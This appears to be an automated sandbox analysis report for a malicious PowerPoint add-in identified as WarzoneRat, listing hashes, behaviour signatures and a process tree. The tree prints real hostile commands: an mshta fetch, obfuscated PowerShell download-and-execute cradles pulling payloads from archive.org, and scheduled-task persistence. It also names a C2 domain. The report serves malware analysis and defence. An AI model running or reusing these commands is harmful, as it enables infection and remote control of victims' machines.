Overview

overview

10

Static

static

IdDetails.ppam

windows7_x64

10

IdDetails.ppam

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    159s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    12-07-2021 06:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    IdDetails.ppam

  • Size

    14KB

  • MD5

    b3c4df30fcb050cd2719916ca70b730d

  • SHA1

    724d8d16bb272d7a15197caed16aebea4fa8adcd

  • SHA256

    ef1ac3f12332198e1ef6f01698658258289a63e08ff17b1ddba89e229b8f19b7

  • SHA512

    f76708ee0cb319c576eb9cf872620c63d8818566be985eb13c258d736b29b1faf9f6f26159c9caba6bc29cd82316739ad8fff1e4ac47c5ee016cd1a2a0613580

Score
10/10
warzoneratinfostealerrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ia801508.us.archive.org/34/items/Coxes/Coxes.txt

Extracted

Family

warzonerat

C2

normanaman.duckdns.org:3009

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

    ratinfostealerwarzonerat
  • Blocklisted process makes network request 23 IoCs
  • Process spawned suspicious child process 1 IoCs

    This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\IdDetails.ppam" /ou ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:656
    • C:\Windows\SYSTEM32\mshta.exe
      mshta http://www.bitly.com/ashjdkqowdhqowdh
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1284
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $www='https://ia801508.us.archive.org/34/items/Coxes/Coxes.txt';$sss= '(NESTRDTYUGIHGYFTRDYTFYUbj'.Replace('ESTRDTYUGIHGYFTRDYTFYU','ew-O');$aaa='ecAAAAAAAAAAAm.NBBBBBBBBBBBBBBbC'.Replace('AAAAAAAAAAA','t Syste').Replace('BBBBBBBBBBBBBB','et.We');$bbb='lieCCCCCCCCCCnloaOOOOOOOOOOOOOOOring($www);'.Replace('CCCCCCCCCC','nt).Dow').Replace('OOOOOOOOOOOOOOO','dst');$hbar=I`E`X ($sss,$aaa,$bbb-Join '')|I`E`X;
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4028
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\lub.vbs"
          4⤵
            PID:4400
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""BlueStacks"" /F /tr ""\""MsHtA""\""http://1230948%1230948@backishbackuponback.blogspot.com/p/clientsced.html\""
          3⤵
          • Creates scheduled task(s)
          PID:2168
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia801403.us.archive.org/11/items/3_20210710_20210710/1.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia801403.us.archive.org/11/items/3_20210710_20210710/2.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia601403.us.archive.org/11/items/3_20210710_20210710/3.txt').GetResponse().GetResponseStream()).ReadToend());
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2064
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            #cmd
            4⤵
              PID:4264
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "{path}"
              4⤵
                PID:4316
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                #cmd
                4⤵
                  PID:4532
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 1284 -s 2964
                3⤵
                • Program crash
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3868
            • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
              "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 3520
              2⤵
              • Process spawned suspicious child process
              • Suspicious use of WriteProcessMemory
              PID:3688
              • C:\Windows\system32\dwwin.exe
                C:\Windows\system32\dwwin.exe -x -s 3520
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:1276
          • C:\Windows\system32\schtasks.exe
            schtasks /create /sc MINUTE /mo 80 /tn ""BatFile"" /F /tr ""\""C:\Users\Public\clone.vbs""
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:4456

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Initial Access

          Execution

          Scheduled Task

          1
          T1053

          Persistence

          Scheduled Task

          1
          T1053

          Privilege Escalation

          Scheduled Task

          1
          T1053

          Defense Evasion

          Credential Access

          Discovery

          System Information Discovery

          3
          T1082

          Query Registry

          2
          T1012

          Lateral Movement

          Collection

          Exfiltration

          Command and Control

          Impact

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            MD5

            ba0c69ceb0908b193521106967959098

            SHA1

            44ca77c41d4ab2c17df1c831c41900e4f692f8de

            SHA256

            71f2c3e06e74aa830de694c5a96927e37919c322b8e2ace896a87cbf44b32f55

            SHA512

            cf70230fe5dc40ff2b4d03dd9dedd7444f70430e35da55627ec8963244f47dce150e371b5015e508fed11b02a8e84cad240cd6d251dac2df3037ce149d03ca97

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            MD5

            5827bf1a55cd254895b9356b771a02d9

            SHA1

            46c618f16d569ae77a27b83761dfb6ace11cdafb

            SHA256

            bbf9d36c70bf6baa69d242a289119ee969462629866518cd663e3bd1fe767917

            SHA512

            21c2d1c98b5edfacfcf3392533d8558d445d4548fc6903d9ab5c6e239a92f24db82df3ab0c1ceca0a040d9c98b5fca05b1d678e8125e90af29765c6a97166d74

            Download Submit
          • C:\Users\Public\lub.vbs
            MD5

            1edd4ddfe49d879dd3c977804a05b9bd

            SHA1

            17157ecc88f381e568f36b9263044450e9dfccbe

            SHA256

            d8a10361792b7d54e4084a5a9736e3c8e47e805be894b9a7965e48793f591efa

            SHA512

            6a75daef70bb16da4f33f33fe8e7263b35e327205c2c0f0cc1e44445c8103021ff200830698013f9ad8b3179127ae45a9260b8d10a2bc147417dc378d3a6d0df

            Download Submit
          • memory/656-118-0x00007FFDD73F0000-0x00007FFDD8FCD000-memory.dmp
            Filesize

            27.9MB

            Download
          • memory/656-117-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/656-115-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/656-122-0x00007FFDD4230000-0x00007FFDD531E000-memory.dmp
            Filesize

            16.9MB

            Download
          • memory/656-123-0x00007FFDCF810000-0x00007FFDD1705000-memory.dmp
            Filesize

            31.0MB

            Download
          • memory/656-114-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/656-119-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/656-116-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/1276-262-0x0000000000000000-mapping.dmp
            Download
          • memory/1284-254-0x0000000000000000-mapping.dmp
            Download
          • memory/2064-280-0x0000029AF8B43000-0x0000029AF8B45000-memory.dmp
            Filesize

            8KB

            Download
          • memory/2064-268-0x0000000000000000-mapping.dmp
            Download
          • memory/2064-333-0x0000029AF8DF0000-0x0000029AF8DF1000-memory.dmp
            Filesize

            4KB

            Download
          • memory/2064-321-0x0000029AF8E80000-0x0000029AF8EA0000-memory.dmp
            Filesize

            128KB

            Download
          • memory/2064-279-0x0000029AF8B40000-0x0000029AF8B42000-memory.dmp
            Filesize

            8KB

            Download
          • memory/2064-305-0x0000029AF8DC0000-0x0000029AF8DCB000-memory.dmp
            Filesize

            44KB

            Download
          • memory/2064-295-0x0000029AF8B46000-0x0000029AF8B48000-memory.dmp
            Filesize

            8KB

            Download
          • memory/2064-310-0x0000029AF8DE0000-0x0000029AF8DE3000-memory.dmp
            Filesize

            12KB

            Download
          • memory/2168-269-0x0000000000000000-mapping.dmp
            Download
          • memory/3688-257-0x0000000000000000-mapping.dmp
            Download
          • memory/3688-299-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/3688-300-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/3688-297-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/3688-298-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/4028-287-0x000001EFB03C0000-0x000001EFB03C1000-memory.dmp
            Filesize

            4KB

            Download
          • memory/4028-264-0x0000000000000000-mapping.dmp
            Download
          • memory/4028-271-0x000001EF97C80000-0x000001EF97C81000-memory.dmp
            Filesize

            4KB

            Download
          • memory/4028-296-0x000001EF97C76000-0x000001EF97C78000-memory.dmp
            Filesize

            8KB

            Download
          • memory/4028-277-0x000001EF97C70000-0x000001EF97C72000-memory.dmp
            Filesize

            8KB

            Download
          • memory/4028-278-0x000001EF97C73000-0x000001EF97C75000-memory.dmp
            Filesize

            8KB

            Download
          • memory/4264-315-0x0000000000400000-0x000000000055E000-memory.dmp
            Filesize

            1.4MB

            Download
          • memory/4264-307-0x0000000000405E28-mapping.dmp
            Download
          • memory/4264-306-0x0000000000400000-0x000000000055E000-memory.dmp
            Filesize

            1.4MB

            Download
          • memory/4316-312-0x0000000000405E28-mapping.dmp
            Download
          • memory/4400-318-0x0000000000000000-mapping.dmp
            Download
          • memory/4532-327-0x0000000000405E28-mapping.dmp
            Download